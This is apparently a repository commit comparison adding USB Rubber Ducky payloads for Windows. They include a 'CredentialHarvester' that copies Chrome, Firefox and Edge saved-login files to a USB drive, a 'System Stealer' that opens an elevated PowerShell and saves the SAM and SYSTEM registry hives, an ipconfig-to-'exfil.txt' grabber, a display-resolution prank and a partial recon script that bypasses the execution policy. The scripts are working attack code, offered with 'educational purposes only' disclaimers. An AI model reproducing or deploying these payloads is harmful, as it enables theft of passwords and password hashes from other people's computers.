Compare commits
27 Commits
c71b83afca
...
acc8dd6ea8
Author | SHA1 | Date |
---|---|---|
Mark | acc8dd6ea8 | |
Peaks | 44af31e74b | |
Mavis Coffey | cacb21ad7e | |
Mavis Coffey | 61eb88ab6c | |
Mavis Coffey | 8be0f9a092 | |
Mavis Coffey | 63e0c18618 | |
Mavis Coffey | 81807425f5 | |
Mavis Coffey | 083951025f | |
Mavis Coffey | 1a5aa0bd08 | |
Mavis Coffey | a323fc3281 | |
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
mavisinator30001 | 8073d4d9cd | |
Mark | f843113663 | |
Mark | 81260982f1 | |
Mark | 582bb6138a | |
Mark | 5b5c57f16b | |
Mark | ddd7d2af4b |
|
@ -0,0 +1,63 @@
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM Open PowerShell with elevated privileges
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
REM Check if the USB drive exists
|
||||||
|
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING if ($usbDrive -ne $null) {
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd $usbDrive
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING mkdir BrowserData
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd BrowserData
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Chrome Login Data to USB
|
||||||
|
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
|
||||||
|
ENTER
|
||||||
|
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Firefox Login Data to USB
|
||||||
|
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
|
||||||
|
ENTER
|
||||||
|
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Edge Login Data to USB
|
||||||
|
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
|
||||||
|
ENTER
|
||||||
|
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
|
||||||
|
STRING echo off ^| clip
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Close PowerShell
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
|
@ -0,0 +1,12 @@
|
||||||
|
# IP-OUT
|
||||||
|
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Useful Tips
|
||||||
|
|
||||||
|
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||||
|
|
||||||
|
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -0,0 +1,63 @@
|
||||||
|
REM Title: IP-Out
|
||||||
|
REM Author: Mavisinator30001
|
||||||
|
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||||
|
REM Target: Any Windows System
|
||||||
|
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DELAY 500
|
||||||
|
GUI r
|
||||||
|
DELAY 300
|
||||||
|
STRINGLN Powershell
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ATTACKMODE OFF
|
||||||
|
HIDE_PAYLOAD
|
|
@ -0,0 +1,74 @@
|
||||||
|
REM TITLE System Stealer
|
||||||
|
REM AUTHOR mavisinator30001
|
||||||
|
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||||
|
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||||
|
REM DISCLAIMER This is for educational purposes ONLY
|
||||||
|
DELAY 1000
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
REM Change $DRIVELABEL to the storage label of your duck
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-SHIFT-ENTER
|
||||||
|
DELAY 750
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ELSE
|
||||||
|
ATTACKMODE OFF
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
|
@ -0,0 +1,5 @@
|
||||||
|
# Resolution Prank
|
||||||
|
|
||||||
|
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||||
|
|
||||||
|
### Somewhat resource dependent, may not work on older computers
|
|
@ -0,0 +1,103 @@
|
||||||
|
REM TITLE Resolution Prank
|
||||||
|
REM AUTHOR Mavisinator30001
|
||||||
|
REM TARGET Any system running Windows 10/11
|
||||||
|
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
LED_G
|
||||||
|
DELAY 500
|
||||||
|
CTRL GUI d
|
||||||
|
DELAY 500
|
||||||
|
GUI i
|
||||||
|
DELAY 2000
|
||||||
|
STRINGLN display
|
||||||
|
DELAY 2500
|
||||||
|
TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REPEAT 8 TAB
|
||||||
|
ENTER
|
||||||
|
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||||
|
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||||
|
HOLD DOWN
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE DOWN
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||||
|
VAR $LIGHT_UP_TIMES = 20
|
||||||
|
WHILE ($LIGHT_UP_TIMES > 0)
|
||||||
|
LED_G
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
LED_R
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||||
|
END_WHILE
|
||||||
|
WAIT_FOR_CAPS_CHANGE
|
||||||
|
END_WHILE
|
||||||
|
DELAY 300
|
||||||
|
REPEAT 12 TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
HOLD UP
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE UP
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
DELAY 200
|
||||||
|
CTRL GUI F4
|
|
@ -0,0 +1,629 @@
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
DELAY 1000
|
||||||
|
REM Open Start Menu
|
||||||
|
CONTROL ESCAPE
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell
|
||||||
|
REM Navigate to the context menu to run PowerShell as an administrator
|
||||||
|
DELAY 500
|
||||||
|
RIGHTARROW
|
||||||
|
DELAY 100
|
||||||
|
DOWNARROW
|
||||||
|
DELAY 100
|
||||||
|
ENTER
|
||||||
|
DELAY 3000
|
||||||
|
ALT Y
|
||||||
|
DELAY 5000
|
||||||
|
REM Set PowerShell Execution Policy to Bypass
|
||||||
|
DELAY 1000
|
||||||
|
STRING set-executionpolicy bypass -scope process -force
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Create the PowerShell script in memory and execute it
|
||||||
|
DELAY 200
|
||||||
|
STRING $usbName = "MYUSB"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($usbDrive) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING New-Item -ItemType Directory -Path $directoryPath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "" > $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-passwordpolicy {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING net accounts
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking password policy: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function audit-services {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-service | select-object name, displayname, status, starttype
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error auditing services: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-networksettings {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-netipconfiguration
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking network settings: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-softwarevulnerabilities {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking software vulnerabilities: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-cve {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING param (
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING [string]$productname,
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING [string]$version
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING )
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $initialDelay = 2
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds $initialDelay
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $response = invoke-restmethod -uri $uri -method get
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($response.totalresults -gt 0) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($cve in $response.result.cve_items) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "no cves found for $productname $version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking CVEs: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($_.Exception -match '403') {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds 60
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $retryResponse = invoke-restmethod -uri $uri -method get
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($retryResponse.totalresults -gt 0) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($cve in $retryResponse.result.cve_items) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "no cves found for $productname $version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function analyze-logs {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-eventlog -logname system -newest 100
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error analyzing logs: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-openports {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING netstat -an
|
||||||
|
DELAY 200
|
||||||
|
